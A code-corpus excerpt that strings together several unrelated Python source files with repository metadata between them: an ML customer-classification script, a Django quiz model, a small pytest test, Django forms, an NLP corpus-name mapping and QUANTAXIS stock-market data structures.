clean_df = pd.concat([clean_df, dummy], axis=1)
# re-engineer PRAEGENDE_JUGENDJAHRE
to_replace = {1:4, 2:4, 3:5, 4:5, 5:6, 6:6, 7:6, 8:7, 9:7, 10:8, 11:8, 12:8, 13:8, 14:9, 15:9}
clean_df['decade'] = clean_df['PRAEGENDE_JUGENDJAHRE'].replace(to_replace)
clean_df.drop(['CAMEO_DEU_2015', 'PRAEGENDE_JUGENDJAHRE', 'D19_LETZTER_KAUF_BRANCHE', 'EINGEFUEGT_AM'] , axis=1, inplace=True)
return clean_df
def fill_null(clean_df):
'''This function takes the cleaned df, fill numerical columns with mean, and
categorical columns with median.
Args: clean df
Return: df without missing values
'''
# select columns with numerical values
num_col = []
for key, item in attr_dict.items():
if item[0] == '…':
num_col.append(key)
# fill mean for numerical columns
for col in num_col:
try:
az_mean = clean_df[col].mean()
clean_df[col] = clean_df[col].fillna(az_mean)
except KeyError:
continue
# fill median for categorical columns
# fill all other columns with mode
for col in clean_df.columns:
try:
az_median = clean_df[col].median()
clean_df[col] = clean_df[col].fillna(az_median)
except KeyError:
continue
return clean_df
def build_model(model):
'''
Creates pipeline with two steps: column transformer (ct) introduced in preprocessing step and classifier (model).
Input:
scaler: scale the features
model: object type that implements the “fit” and “predict” methods
Output:
pipeline: object type with "fit" and "predict" methods
'''
pipeline = Pipeline([
('scaler', StandardScaler()),
('clf', model)
])
parameters = {
'clf__n_estimators': [50, 100, 200],
'clf__learning_rate': [0.001, 0.01, 0.1],
'clf__boosting_type': ['gbdt','dart'],
'clf__num_leaves': [31, 62]
#'clf__base_estimator__min_samples_split': [2, 5, 10],
#'clf__base_estimator__max_depth': [1, 3, 5]
}
cv = GridSearchCV(pipeline, param_grid=parameters)
return cv
def clean_test(df_cus):
'''Processes data
- Converts missing values to np.nan using loaded features table
- Drops unwanted columns and rows
- Convert mixed datatype to float
- Perfroms feature enginerring
Args:
df (pd.Dataframe): data to be cleaned
Returns:
cleaned_df (pd.Dataframe): cleaned rows
'''
cols = df_cus.columns[18:20]
for col in cols:
df_cus[col] = df_cus[col].apply(lambda x: ml.check_value(x))
# get dummy regions
dummy = pd.get_dummies(df_cus['OST_WEST_KZ'])
df_cus.drop('OST_WEST_KZ', axis=1, inplace=True)
df_cus = pd.concat([df_cus, dummy], axis=1)
# replace decade
to_replace = {1:4, 2:4, 3:5, 4:5, 5:6, 6:6, 7:6, 8:7, 9:7, 10:8, 11:8, 12:8, 13:8, 14:9, 15:9}
df_cus['decade'] = df_cus['PRAEGENDE_JUGENDJAHRE'].replace(to_replace)
# drop unused row
df_cus.drop(['CAMEO_DEU_2015', 'PRAEGENDE_JUGENDJAHRE'] , axis=1, inplace=True)
return df_cus
def evaluate_model(cv, X_test, y_test):
"""Draw ROC curve for the model
Args:
Classification Model
X_test, y_test, Array-like
return: ROC curve and model pickles
"""
y_pred = cv.predict_proba(X_test)[:,1]
print('\nBest Parameters:', cv.best_params_)
fpr, tpr, thresholds = roc_curve(y_test, y_pred)
roc_auc = auc(fpr, tpr) # compute area under the curve
plt.figure()
plt.plot(fpr, tpr, label='ROC curve (area = %0.2f)' % (roc_auc))
plt.plot([0, 1], [0, 1], 'k--')
plt.xlim([0.0, 1.0])
plt.ylim([0.0, 1.05])
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.title('Receiver operating characteristic')
plt.legend(loc="lower right")
# create the axis of thresholds (scores)
ax2 = plt.gca().twinx()
ax2.plot(fpr, thresholds, markeredgecolor='r',linestyle='dashed', color='r')
ax2.set_ylabel('Threshold',color='r')
ax2.set_ylim([thresholds[-1],thresholds[0]])
ax2.set_xlim([fpr[0],fpr[-1]])
print('Saving model...')
f = open('parameters'+'.pkl', 'wb')
pickle.dump(cv.best_params_, f)
| 33.231132 | 130 | 0.64088 |
3e6044ec5e462f98f0bc3ac520e1b03382de7212 | 3,898 | py | Python | quiz/models/quiz.py | manikagarg/iQuiz | 99b2550eeedb92134a631d71fdb017844f81ef78 | [
"MIT"
] | null | null | null | quiz/models/quiz.py | manikagarg/iQuiz | 99b2550eeedb92134a631d71fdb017844f81ef78 | [
"MIT"
] | null | null | null | quiz/models/quiz.py | manikagarg/iQuiz | 99b2550eeedb92134a631d71fdb017844f81ef78 | [
"MIT"
] | 1 | 2021-09-26T14:10:28.000Z | 2021-09-26T14:10:28.000Z | from django.db import models
from django.utils import timezone
import datetime
#from django.core.validators import MinValueValidator, MaxValueValidator
from .lti_user import *
from . import custom_fields as custom_fields
class Quiz(models.Model):
"""
The Quiz Model is used to store the basic information about the quiz.
The Primary Key (auto generated) will be used as Quiz Id.
"""
consumer_key = models.CharField(max_length=100, help_text='Used to store LTI consumer key')
resourceLinkId = models.CharField(max_length=100, help_text = "Resource_link_id")
contextId = models.CharField(
max_length=200,
help_text="Context Id: Unique for each term (run) of the course"
)
createdOn = models.DateTimeField(default=datetime.datetime.utcnow)
updatedOn = models.DateTimeField(auto_now=True)
quizName = models.CharField(max_length=100, blank=True)
published = models.BooleanField(default=False)
isEverAttempted = models.BooleanField(
default=False,
help_text="Set to True if the Quiz has been attempted by at least one student"
)
def save(self, *args, **kwargs):
self.updatedOn = datetime.datetime.utcnow()
super().save(*args, **kwargs)
def __str__(self):
if (self.quizName != ''):
return self.quizName
return str(self.contextId) + " : " + str(self.createdOn)
class Meta:
get_latest_by = "createdOn"
class QuizSettings(models.Model):
"""
The class to store the Settings of a Quiz
"""
quiz = models.OneToOneField(Quiz, on_delete = models.CASCADE, primary_key=True)
deadline = models.DateTimeField(
blank=True,
null=True,
verbose_name="Deadline",
help_text="Set the deadline for the Quiz. Leave blank if not required"
)
# NULL value of duration means unlimited time
duration = custom_fields.IntegerRangeField(
default=30,
null=True,
verbose_name="Duration",
min_value=1,
blank=True,
help_text="Set the duration of quiz in minutes. Leave blank if timer is not required")
timeBetweenAttempt = custom_fields.IntegerRangeField(
default=0, null=True,
verbose_name="Time Between Attempts",
min_value=0,
help_text="Set the time between the two consecutive attempts."
)
maxAttempts = custom_fields.IntegerRangeField(
blank=True,
null=True,
verbose_name="Maximum Attempts",
help_text="Set the maximum number of allowed attempts. Leave blank for unlimited attempts."
)
graded = models.BooleanField(
default = True,
verbose_name="Graded",
help_text="Set whether the quiz is graded"
)
information = models.TextField(
default='',
verbose_name="Information",
help_text="Set the information that will be shown to the student on the quiz page.\
This will be shown in a html modal on clicking the button 'Information'. Leave blank to hide the button."
)
# TODO: showAnswers = models.ChoiceField() ##To be implemented
def __str__(self):
if self.quiz.quizName != '':
return self.quiz.quizName
return str(self.quiz.contextId) + " : " + str(self.quiz.createdOn)
def save(self, *args, **kwargs):
if self.deadline =='':
self.deadline = None
if self.duration == '':
self.duration = None
if self.maxAttempts == '':
self.maxAttempts = None
super().save(*args, **kwargs)
class QuizManager(models.Model):
"""
The QuizManager model is used to store the details of the manager of the quiz.
"""
quiz = models.ForeignKey(Quiz, on_delete=models.CASCADE)
manager = models.ForeignKey(LTIUser, on_delete=models.CASCADE)
def __str__(self):
return self.manager.name | 34.803571 | 114 | 0.659056 |
a351a9854dcdf37c8857cd14380c11509f1d039c | 243 | py | Python | tests/utils/test_cbook.py | fossabot/jcvi | 86948affd63e94c8327cf117c47d36940b508b68 | [
"BSD-2-Clause"
] | 1 | 2020-10-04T13:21:24.000Z | 2020-10-04T13:21:24.000Z | tests/utils/test_cbook.py | Wangjien/jcvi | 6732285f62dcbd7f3878e5017c3350124530c796 | [
"BSD-2-Clause"
] | null | null | null | tests/utils/test_cbook.py | Wangjien/jcvi | 6732285f62dcbd7f3878e5017c3350124530c796 | [
"BSD-2-Clause"
] | null | null | null | import pytest
@pytest.mark.parametrize(
"input,output", [("AT5G54690.2", "AT5G54690"), ("evm.test.1", "evm.test.1")],
)
def test_gene_name(input, output):
from jcvi.utils.cbook import gene_name
assert gene_name(input) == output
| 22.090909 | 81 | 0.683128 |
4cd6d530b4db1b2e9a037897cf2cdeb7fa06c57a | 1,199 | py | Python | profile/forms.py | ChristopherOloo/KilimoQAPortal | c905a42282bbce70b5477862185ad332185307ce | [
"MIT"
] | 67 | 2022-01-05T18:59:23.000Z | 2022-03-18T13:13:39.000Z | profile/forms.py | ChristopherOloo/KilimoQAPortal | c905a42282bbce70b5477862185ad332185307ce | [
"MIT"
] | 3 | 2022-01-10T10:03:23.000Z | 2022-03-11T16:58:38.000Z | profile/forms.py | ChristopherOloo/KilimoQAPortal | c905a42282bbce70b5477862185ad332185307ce | [
"MIT"
] | 4 | 2022-01-08T17:39:19.000Z | 2022-02-28T07:40:16.000Z | from django import forms
from .models import Profile,Position
from martor.fields import MartorFormField
class EditProfileForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['profile_photo','full_name','location','title','about_me',
'website_link','twitter_link','github_link',
'not_to_Display_Full_name']
class EmailForm(forms.Form):
name = forms.CharField(max_length=25)
email = forms.EmailField()
review = MartorFormField()
class PositionCreateForm(forms.ModelForm):
class Meta:
model = Position
fields = ['company_name','title']
JOB_TYPE_CHOICES = [
('FULL_TIME', 'Full Time'),
('CONTRCT', 'Contract'),
('InternShip', 'InternShip'),
]
class EditJobPrefrences(forms.ModelForm):
# job_type = forms.MultipleChoiceField(choices=JOB_TYPE_CHOICES, widget=forms.CheckboxSelectMultiple())
class Meta:
model = Profile
fields = ['min_expierence_level',
'max_expierence_level','job_type',
'job_search_status','phone_number']
widgets = {
'job_search_status': forms.RadioSelect(),
# 'job_type': forms.CheckboxSelectMultiple(),
}
class EditEmailForm(forms.ModelForm):
class Meta:
model = Profile
fields = ['email'] | 23.057692 | 104 | 0.719766 |
3f19fb7d69cc5c31dcf502a5b3927a78b26451eb | 5,134 | py | Python | flair/corpus_mapping.py | mlej8/MultilangStructureKD | 735a5a3835f63146cd83132c979fa58a9be2dace | [
"MIT"
] | 62 | 2020-04-28T05:05:10.000Z | 2022-03-17T18:26:45.000Z | flair/corpus_mapping.py | mlej8/MultilangStructureKD | 735a5a3835f63146cd83132c979fa58a9be2dace | [
"MIT"
] | 10 | 2020-12-21T21:52:09.000Z | 2021-08-06T13:11:56.000Z | flair/corpus_mapping.py | mlej8/MultilangStructureKD | 735a5a3835f63146cd83132c979fa58a9be2dace | [
"MIT"
] | 7 | 2020-07-09T12:42:00.000Z | 2021-04-28T09:17:38.000Z | corpus_map={'ner':{'eng':'CONLL_03_ENGLISH','en':'CONLL_03','nl':'CONLL_03_DUTCH','es':'CONLL_03_SPANISH','de':'CONLL_03_GERMAN'},
'upos':{'en':'UD_ENGLISH','nl':'UD_DUTCH','es':'UD_SPANISH','de':'UD_GERMAN','fr':'UD_FRENCH','it':'UD_ITALIAN','pt':'UD_PORTUGUESE','zh':'UD_CHINESE','ja':'UD_JAPANESE','ta':'UD_TAMIL','eu':'UD_BASQUE','fi':'UD_FINNISH','he':'UD_HEBREW','ar':'UD_ARABIC','id':'UD_INDONESIAN','cs':'UD_CZECH','fa':'UD_PERSIAN'},
'chunk':{'en':'CONLL_03','de':'CONLL_03_GERMAN'},
'panx':{'en':'PANX-EN','ta':'PANX-TA','fi':'PANX-FI','eu':'PANX-EU','he':'PANX-HE','ar':'PANX-AR','id':'PANX-ID','cs':'PANX-CS','it':'PANX-IT','fa':'PANX-FA','ja':'PANX-JA','sl':'PANX-SL','fr':'PANX-FR','pt':'PANX-PT','de':'PANX-DE','es':'PANX-ES','nl':'PANX-NL'},
'mixedner':{'en':'CONLL_03','nl':'CONLL_03_DUTCH','es':'CONLL_03_SPANISH','de':'CONLL_03_GERMAN','eu':'MIXED_NER-EU','fa':'MIXED_NER-FA','fi':'MIXED_NER-FI','fr':'MIXED_NER-FR','he':'MIXED_NER-HE','hi':'MIXED_NER-HI','hr':'MIXED_NER-HR','id':'MIXED_NER-ID','ja':'MIXED_NER-JA','no':'MIXED_NER-NO','pl':'MIXED_NER-PL','pt':'MIXED_NER-PT','sl':'MIXED_NER-SL','sv':'MIXED_NER-SV','ta':'MIXED_NER-TA'},
'lowmixedner':{'en':'MIXED_NER-EN','nl':'MIXED_NER-NL','es':'MIXED_NER-ES','de':'MIXED_NER-DE','eu':'MIXED_NER-EU','fa':'MIXED_NER-FA','fi':'MIXED_NER-FI','fr':'MIXED_NER-FR','he':'MIXED_NER-HE','hi':'MIXED_NER-HI','hr':'MIXED_NER-HR','id':'MIXED_NER-ID','ja':'MIXED_NER-JA','no':'MIXED_NER-NO','pl':'MIXED_NER-PL','pt':'MIXED_NER-PT','sl':'MIXED_NER-SL','sv':'MIXED_NER-SV','ta':'MIXED_NER-TA'},
'richmixedner':{'en':'MIXED_NER-EN','nl':'MIXED_NER-NL','es':'MIXED_NER-ES','de':'MIXED_NER-DE'},
'indoeuro1':{'cs':'MIXED_NER-CS','fa':'MIXED_NER-FA','fr':'MIXED_NER-FR','hi':'MIXED_NER-HI','hr':'MIXED_NER-HR'},
'indoeuro2':{'no':'MIXED_NER-NO','pl':'MIXED_NER-PL','pt':'MIXED_NER-PT','sl':'MIXED_NER-SL','sv':'MIXED_NER-SV'},
'difffam':{'ce':'MIXED_NER-CE','vi':'MIXED_NER-VI','zh':'MIXED_NER-ZH','ka':'MIXED_NER-KA','eu':'MIXED_NER-EU'},
'turkic':{'az':'MIXED_NER-AZ','kk':'MIXED_NER-KK','tr':'MIXED_NER-TR','ky':'MIXED_NER-KY','tt':'MIXED_NER-TT'},
'austronesian':{'ms':'MIXED_NER-MS','su':'MIXED_NER-SU','tl':'MIXED_NER-TL','id':'MIXED_NER-ID','mg':'MIXED_NER-MG'},
'lowner':{'eu':'MIXED_NER-EU','fa':'MIXED_NER-FA','fi':'MIXED_NER-FI','fr':'MIXED_NER-FR','he':'MIXED_NER-HE','hi':'MIXED_NER-HI','hr':'MIXED_NER-HR','id':'MIXED_NER-ID','ja':'MIXED_NER-JA','no':'MIXED_NER-NO','pl':'MIXED_NER-PL','pt':'MIXED_NER-PT','sl':'MIXED_NER-SL','sv':'MIXED_NER-SV','ta':'MIXED_NER-TA'},
'low10ner':{'en':'CONLL_03','nl':'CONLL_03_DUTCH','es':'CONLL_03_SPANISH','de':'CONLL_03_GERMAN','eu':'LOW10_NER-EU','fa':'LOW10_NER-FA','fi':'LOW10_NER-FI','fr':'LOW10_NER-FR','he':'LOW10_NER-HE','hi':'LOW10_NER-HI','hr':'LOW10_NER-HR','id':'LOW10_NER-ID','ja':'LOW10_NER-JA','no':'LOW10_NER-NO','pl':'LOW10_NER-PL','pt':'LOW10_NER-PT','sl':'LOW10_NER-SL','sv':'LOW10_NER-SV','ta':'LOW10_NER-TA'},
'commner':{'en':'COMMNER-EN','es':'COMMNER-ES','fr':'COMMNER-FR','ru':'COMMNER-RU'},
'semeval':{'tr':'SEMEVAL16-TR','es':'SEMEVAL16-ES','nl':'SEMEVAL16-NL','en':'SEMEVAL16-EN','ru':'SEMEVAL16-RU'},
'smallud':{'en':'UD_English-EWT','he':'UD_Hebrew-HTB','ja':'UD_Japanese-GSD','sl':'UD_Slovenian-SST','fr':'UD_French-Sequoia','id':'UD_Indonesian-GSD','fa':'UD_Persian-Seraji','ta':'UD_Tamil-TTB','nl':'UD_Dutch-LassySmall','de':'UD_German-GSD','sv':'UD_Swedish-LinES','it':'UD_Italian-PoSTWITA','es':'UD_Spanish-GSD','cs':'UD_Czech-FicTree','ar':'UD_Arabic-PADT'},
# 'cs':{'en':'CALCS-EN','eg':'CALCS-EG','es':'CALCS-ES','ar':'CALCS-AR'},
'srl':{'en':'SRL-EN','de':'SRL-DE','es':'SRL-ES','zh':'SRL-ZH','cs':'SRL-CS','ca':'SRL-CA'},
'atis':{'en':'ATIS-EN','hi':'ATIS-HI','tr':'ATIS-TR'},
'enhancedud':{'ar':'UD_Arabic','bg':'UD_Bulgarian','cs':'UD_Czech','nl':'UD_Dutch','en':'UD_English','et':'UD_Estonian','fi':'UD_Finnish','fr':'UD_French','it':'UD_Italian','lv':'UD_Latvian','lt':'UD_Lithuanian','pl':'UD_Polish','ru':'UD_Russian','sk':'UD_Slovak','sv':'UD_Swedish','ta':'UD_Tamil','uk':'UD_Ukrainian'},
'dependency':{'ptb':'PTB','ctb':'CTB','en':'UD_English-EWT','he':'UD_Hebrew-HTB','ja':'UD_Japanese-GSD','sl':'UD_Slovenian-SST','fr':'UD_French-Sequoia','id':'UD_Indonesian-GSD','fa':'UD_Persian-Seraji','ta':'UD_Tamil-TTB','nl':'UD_Dutch-LassySmall','de':'UD_German-GSD','sv':'UD_Swedish-LinES','it':'UD_Italian-PoSTWITA','es':'UD_Spanish-GSD','cs':'UD_Czech-FicTree','ar':'UD_Arabic-PADT'},
}
corpus_map['mixed_data']={}
corpus_map['mixed_data'].update(corpus_map['indoeuro1'])
corpus_map['mixed_data'].update(corpus_map['indoeuro2'])
corpus_map['mixed_data'].update(corpus_map['difffam'])
corpus_map['mixed_data'].update(corpus_map['turkic'])
corpus_map['mixed_data'].update(corpus_map['austronesian'])
def set_reverse_corpus_map(corpus_map):
reverse_corpus_map={}
for key in corpus_map:
reverse_corpus_map[key]={}
for lang in corpus_map[key]:
reverse_corpus_map[key][corpus_map[key][lang]]=lang
return reverse_corpus_map
reverse_corpus_map=set_reverse_corpus_map(corpus_map) | 131.641026 | 402 | 0.648617 |
95628b7f76f092081ef5e00f7b27e7fd5066f388 | 23,187 | py | Python | QUANTAXIS/QAData/QADataStruct.py | lxqjswa/QUANTAXIS | a5f89b28a75d1a5094630a4ed166f596840528b1 | [
"MIT"
] | 1 | 2018-09-09T02:55:10.000Z | 2018-09-09T02:55:10.000Z | QUANTAXIS/QAData/QADataStruct.py | lxqjswa/QUANTAXIS | a5f89b28a75d1a5094630a4ed166f596840528b1 | [
"MIT"
] | null | null | null | QUANTAXIS/QAData/QADataStruct.py | lxqjswa/QUANTAXIS | a5f89b28a75d1a5094630a4ed166f596840528b1 | [
"MIT"
] | null | null | null | # coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2018 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""
定义一些可以扩展的数据结构
方便序列化/相互转换
"""
import datetime
import itertools
import os
import platform
import statistics
import sys
import time
import webbrowser
from copy import copy
from functools import lru_cache, partial, reduce
import numpy as np
import pandas as pd
from pyecharts import Kline
from QUANTAXIS.QAData.base_datastruct import _quotation_base
from QUANTAXIS.QAData.data_fq import QA_data_stock_to_fq
from QUANTAXIS.QAData.data_resample import QA_data_tick_resample, QA_data_day_resample, QA_data_min_resample
from QUANTAXIS.QAData.proto import stock_day_pb2 # protobuf import
from QUANTAXIS.QAData.proto import stock_min_pb2
from QUANTAXIS.QAIndicator import EMA, HHV, LLV, SMA
from QUANTAXIS.QAUtil import (DATABASE, QA_util_log_info,
QA_util_random_with_topic,
QA_util_to_json_from_pandas,
QA_util_to_pandas_from_json, trade_date_sse)
from QUANTAXIS.QAUtil.QADate import QA_util_to_datetime
from QUANTAXIS.QAUtil.QAParameter import FREQUENCE, MARKET_TYPE
class QA_DataStruct_Stock_day(_quotation_base):
'''
股票日线数据
'''
def __init__(self, init_data_by_df, dtype='stock_day', if_fq='bfq'):
'''
# 🛠 todo dtype=stock_day 和 QA_DataStruct_Stock_day 类的名字是对应的 不变的不需要指定 ,容易出错,建议改成常量 ❌
:param init_data_by_df: DataFrame 类型的数据,包含了数据,用来初始化这个类
:param dtype: stock_day 🛠 todo 改成常量
:param if_fq: 是否复权
'''
super().__init__(init_data_by_df, dtype, if_fq)
if isinstance(init_data_by_df, pd.DataFrame) == False:
print("QAError init_data_by_df is not kind of DataFrame type !")
# 抽象类继承
def choose_db(self):
self.mongo_coll = DATABASE.stock_day
def __repr__(self):
return '< QA_DataStruct_Stock_day with {} securities >'.format(len(self.code))
__str__ = __repr__
# 前复权
def to_qfq(self):
if self.if_fq is 'bfq':
if len(self.code) < 1:
self.if_fq = 'qfq'
return self
# elif len(self.code) < 20:
# return self.new(pd.concat(list(map(
# lambda x: QA_data_stock_to_fq(self.data[self.data['code'] == x]), self.code))), self.type, 'qfq')
else:
return self.new(
self.groupby(level=1).apply(QA_data_stock_to_fq, 'qfq'), self.type, 'qfq')
else:
QA_util_log_info(
'none support type for qfq Current type is: %s' % self.if_fq)
return self
# 后复权
def to_hfq(self):
if self.if_fq is 'bfq':
if len(self.code) < 1:
self.if_fq = 'hfq'
return self
else:
return self.new(
self.groupby(level=1).apply(QA_data_stock_to_fq, 'hfq'), self.type, 'hfq')
# return self.new(pd.concat(list(map(lambda x: QA_data_stock_to_fq(
# self.data[self.data['code'] == x], 'hfq'), self.code))), self.type, 'hfq')
else:
QA_util_log_info(
'none support type for qfq Current type is: %s' % self.if_fq)
return self
@property
@lru_cache()
def high_limit(self):
'涨停价'
return self.groupby(level=1).close.apply(lambda x: round((x.shift(1) + 0.0002)*1.1, 2)).sort_index()
@property
@lru_cache()
def low_limit(self):
'跌停价'
return self.groupby(level=1).close.apply(lambda x: round((x.shift(1) + 0.0002)*0.9, 2)).sort_index()
@property
@lru_cache()
def next_day_low_limit(self):
"明日跌停价"
return round((self.data.close + 0.0002) * 0.9, 2)
@property
@lru_cache()
def next_day_high_limit(self):
"明日涨停价"
return round((self.data.close + 0.0002) * 1.1, 2)
@property
def preclose(self):
try:
return self.data.preclose
except:
return None
pre_close=preclose
@property
def price_chg(self):
try:
return (self.close-self.preclose)/self.preclose
except:
return None
@property
@lru_cache()
def week(self):
return self.resample('w')
@property
@lru_cache()
def month(self):
return self.resample('M')
@property
@lru_cache()
def quarter(self):
return self.resample('Q')
# @property
# @lru_cache()
# def semiannual(self):
# return self.resample('SA')
@property
@lru_cache()
def year(self):
return self.resample('Y')
def resample(self, level):
try:
return self.add_func(QA_data_day_resample, level).sort_index()
except Exception as e:
print('QA ERROR : FAIL TO RESAMPLE {}'.format(e))
return None
class QA_DataStruct_Stock_min(_quotation_base):
def __init__(self, DataFrame, dtype='stock_min', if_fq='bfq'):
super().__init__(DataFrame, dtype, if_fq)
try:
if 'preclose' in DataFrame.columns:
self.data = DataFrame.loc[:, [
'open', 'high', 'low', 'close', 'volume', 'amount', 'preclose']]
else:
self.data = DataFrame.loc[:, [
'open', 'high', 'low', 'close', 'volume', 'amount']]
except Exception as e:
raise e
if 'high_limit' not in self.data.columns:
self.data['high_limit'] = round(
(self.data.close.shift(1) + 0.0002) * 1.1, 2)
if 'low_limit' not in self.data.columns:
self.data['low_limit'] = round(
(self.data.close.shift(1) + 0.0002) * 0.9, 2)
self.type = dtype
self.if_fq = if_fq
# 抽象类继承
def choose_db(self):
self.mongo_coll = DATABASE.stock_min
def __repr__(self):
return '< QA_DataStruct_Stock_Min with {} securities >'.format(len(self.code))
__str__ = __repr__
def to_qfq(self):
if self.if_fq is 'bfq':
if len(self.code) < 1:
self.if_fq = 'qfq'
return self
# elif len(self.code) < 20:
# data = QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: QA_data_stock_to_fq(
# self.data[self.data['code'] == x]), self.code))).set_index(['datetime', 'code'], drop=False))
# data.if_fq = 'qfq'
# return data
else:
return self.new(
self.groupby(level=1).apply(QA_data_stock_to_fq, 'qfq'), self.type, 'qfq')
else:
QA_util_log_info(
'none support type for qfq Current type is:%s' % self.if_fq)
return self
def to_hfq(self):
if self.if_fq is 'bfq':
if len(self.code) < 1:
self.if_fq = 'hfq'
return self
else:
return self.new(
self.groupby(level=1).apply(QA_data_stock_to_fq, 'hfq'), self.type, 'hfq')
# data = QA_DataStruct_Stock_min(pd.concat(list(map(lambda x: QA_data_stock_to_fq(
# self.data[self.data['code'] == x], 'hfq'), self.code))).set_index(['datetime', 'code'], drop=False))
# data.if_fq = 'hfq'
# return data
else:
QA_util_log_info(
'none support type for qfq Current type is:%s' % self.if_fq)
return self
@property
def high_limit(self):
'涨停价'
return self.data.high_limit
@property
def low_limit(self):
'跌停价'
return self.data.low_limit
def resample(self, level):
try:
return self.add_func(QA_data_min_resample, level).sort_index()
except Exception as e:
print('QA ERROR : FAIL TO RESAMPLE {}'.format(e))
return None
@property
@lru_cache()
def min5(self):
return self.resample('5min')
@property
@lru_cache()
def min15(self):
return self.resample('15min')
@property
@lru_cache()
def min30(self):
return self.resample('30min')
@property
@lru_cache()
def min60(self):
return self.resample('60min')
class QA_DataStruct_Future_day(_quotation_base):
def __init__(self, DataFrame, dtype='future_day', if_fq=''):
self.type = 'future_day'
self.data = DataFrame.loc[:, [
'open', 'high', 'low', 'close', 'trade', 'position', 'price']]
self.if_fq = if_fq
# 抽象类继承
def choose_db(self):
self.mongo_coll = DATABASE.future_day
def __repr__(self):
return '< QA_DataStruct_Future_day with {} securities >'.format(len(self.code))
__str__ = __repr__
class QA_DataStruct_Future_min(_quotation_base):
"""
struct for future
"""
def __init__(self, DataFrame, dtype='future_min', if_fq=''):
# 🛠todo 期货分钟数据线的维护, 暂时用日线代替分钟线
self.type = 'future_day'
self.data = DataFrame.loc[:, [
'open', 'high', 'low', 'close', 'trade', 'position', 'price']]
self.if_fq = if_fq
# 抽象类继承
def choose_db(self):
self.mongo_coll = DATABASE.future_min
def __repr__(self):
return '< QA_DataStruct_Future_min with {} securities >'.format(len(self.code))
__str__ = __repr__
class QA_DataStruct_Index_day(_quotation_base):
'自定义的日线数据结构'
def __init__(self, DataFrame, dtype='index_day', if_fq=''):
self.data = DataFrame
self.type = dtype
self.if_fq = if_fq
# self.mongo_coll = eval(
# 'DATABASE.{}'.format(self.type))
"""
def __add__(self,DataStruct):
'add func with merge list and reindex'
assert isinstance(DataStruct,QA_DataStruct_Index_day)
if self.if_fq==DataStruct.if_fq:
self.sync_status(pd.concat())
"""
# 抽象类继承
def choose_db(self):
self.mongo_coll = DATABASE.index_day
def __repr__(self):
return '< QA_DataStruct_Index_day with {} securities >'.format(len(self.code))
__str__ = __repr__
class QA_DataStruct_Index_min(_quotation_base):
'自定义的分钟线数据结构'
def __init__(self, DataFrame, dtype='index_min', if_fq=''):
self.type = dtype
self.if_fq = if_fq
self.data = DataFrame.loc[:, [
'open', 'high', 'low', 'close', 'up_count', 'down_count', 'volume', 'amount']]
#self.mongo_coll = DATABASE.index_min
# 抽象类继承
def choose_db(self):
self.mongo_coll = DATABASE.index_min
def __repr__(self):
return '< QA_DataStruct_Index_Min with %s securities >' % len(self.code)
__str__ = __repr__
class QA_DataStruct_Stock_transaction():
def __init__(self, DataFrame):
"""Stock Transaction
Arguments:
DataFrame {pd.Dataframe} -- [input is one/multi day transaction]
"""
self.type = 'stock_transaction'
self.data = DataFrame
if 'amount' not in DataFrame.columns:
if 'vol' in DataFrame.columns:
self.data['amount'] = self.data.vol * self.data.price * 100
elif 'volume' in DataFrame.columns:
self.data['amount'] = self.data.volume * self.data.price * 100
self.mongo_coll = DATABASE.stock_transaction
@property
@lru_cache()
def buyorsell(self):
"""return the buy or sell towards 0--buy 1--sell 2--none
Decorators:
lru_cache
Returns:
[pd.Series] -- [description]
"""
return self.data.buyorsell
@property
@lru_cache()
def price(self):
"""return the deal price of tick transaction
Decorators:
lru_cache
Returns:
[type] -- [description]
"""
return self.data.price
@property
@lru_cache()
def vol(self):
"""return the deal volume of tick
Decorators:
lru_cache
Returns:
pd.Series -- volume of transaction
"""
try:
return self.data.volume
except:
return self.data.vol
volume = vol
@property
@lru_cache()
def date(self):
"""return the date of transaction
Decorators:
lru_cache
Returns:
pd.Series -- date of transaction
"""
return self.data.date
@property
@lru_cache()
def time(self):
"""return the exact time of transaction(to minute level)
Decorators:
lru_cache
Returns:
pd.Series -- till minute level
"""
return self.data.time
@property
@lru_cache()
def datetime(self):
"""return the datetime of transaction
Decorators:
lru_cache
Returns:
pd.Series -- [description]
"""
return self.data.datetime
@property
@lru_cache()
def order(self):
"""return the order num of transaction/ for everyday change
Decorators:
lru_cache
Returns:
pd.series -- [description]
"""
return self.data.order
@property
@lru_cache()
def index(self):
"""return the transaction index
Decorators:
lru_cache
Returns:
[type] -- [description]
"""
return self.data.index
@property
@lru_cache()
def amount(self):
"""return current tick trading amount
Decorators:
lru_cache
Returns:
[type] -- [description]
"""
return self.data.amount
"""
最新:IF(ISNULL(NEW),PRE,NEW);
IF (ISNULL(RANGE_AVG_PRICE) OR RANGE_AVG_PRICE <= 0)
{
IF (MARKETTYPE == 232 OR MARKETTYPE == 56 OR MARKETTYPE==64 OR MARKETTYPE==128 OR MARKETTYPE==168 OR MARKETTYPE==184 OR MARKETTYPE == 200 OR MARKETTYPE == 80 OR (VOL > 1 AND VOL<100))
{
b=SUBSAMEDAY(&VOL) ;
m=SUM(b*最新,0);
均价:IF(m>0,m/VOL,PRE);
}
ELSE IF(CODETYPE!=0 AND MONEY>0)
{
IF(ISNULL(MONEY) OR ISNULL(VOL) OR VOL==0 OR MONEY==0)
均价:PRE;
ELSE IF(VOL==VOL[1] OR MONEY==MONEY[1])
均价:均价[1];
ELSE
